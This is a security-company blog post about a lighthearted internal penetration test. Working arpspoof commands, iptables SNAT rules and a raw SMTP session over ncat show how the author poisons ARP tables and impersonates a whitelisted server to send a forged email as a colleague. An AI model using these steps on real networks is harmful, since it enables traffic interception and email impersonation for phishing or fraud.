In Blog

After having to pay rounds because of the Rubber Ducky attack, I wanted a revenge ! Daniel participated in the hardening of our email server and apparently he put extra effort to prevent SMTP mail spoofing. A hack bypassing this would be great!

First I wanted to check whether I was able to send a email by spoofing the sender’s address, using raw SMTP commands.

Attack example:

HELO servername
MAIL FROM: --SENDER ADDRESS--
RCPT TO: --RECIPIENT ADDRESS--
DATA
Subject: --THE SUBJECT--
--TYPE YOUR MESSAGE--
.
QUIT

Sending a raw email with a telnet-like tool would allow me to spoof any OKIOK addresses from the internal network. However, things are not always so easy, especially when the server is well-configured. Indeed, our server forces users to authenticate prior to accepting any message from OKIOK addresses.

After some digging through internal documentation, I discovered that some very specific systems do not have the ability to authenticate through SMTP. The IP addresses of these systems is whitelisted in the configuration on the email server itself. After more research and some social engineering with our support IT staff, I got an IP address of a whitelisted system from a subnet I can connect to. Here we go!

I connected my computer to the same IP subnet (my IP: 10.10.10.66) as the whitelisted server (server IP: 10.10.10.3). From this subnet, I am able to communicate with the email server (10.250.0.10) located in another IP subnet. To intercept traffic from my local subnet, ARP poisoning is a hacker’s choice.

# Allow IP forwarding (you do not want to alert every admins )
echo 1 > /proc/sys/net/ipv4/ip_forward
# Some NATing
iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -o eth2 -j MASQUERADE
# ARP poisoning time (gateway IP: 10.10.10.1)
arpspoof -i eth0 -t 10.10.10.3 10.10.10.1
arpspoof -i eth0 -t 10.10.10.1 10.10.10.3

Now, the network traffic between the whitelisted server (10.10.10.3) and the gateway (10.10.10.1) goes to my computer (10.10.10.66) before being forwarded:

Next, I have to find a way to spoof my IP but still have a complete TCP session. Let’s do some IPTables kung fu.

# For each TCP packets with source port set to 33077 and destination port set to 25, modify the source IP to 10.10.10.3
iptables -t nat -I POSTROUTING -o eth0 -p tcp --sport 33077 --dport 25 -j SNAT --to 10.10.10.3

Now, let use our favorite telnet-like tool to send the email using SMTP commands:

$> ncat -C 10.250.0.10 25 -p 33077 -v
Ncat: Version 6.25 ( https://nmap.org/ncat )
Ncat: Connected to 10.250.0.10:25.
220 email.okiok.com Microsoft ESMTP MAIL Service ready at Tue, 29 Jan 2013 13:33:37 -0500
HELO mailserver
250 email.okiok.com Hello [10.10.10.3]
MAIL FROM: daniel@okiok.com
250 2.1.0 Sender OK
RCPT TO: pentest@okiok.com
250 2.1.5 Recipient OK
DATA
354 Start mail input; end with .
Subject: Friday beer !
Hey, I am going to pay the beer to everyone next Friday!
: )
Daniel
.
250 2.6.0 <68eaaaaa-90aa-4daa-91aa-8929aaaaaaaa@email.okiok.com> [InternalId=12345] Queued mail for delivery
QUIT

Conclusion: The beer was delicious that next Friday!

Leave a Comment

Start typing and press Enter to search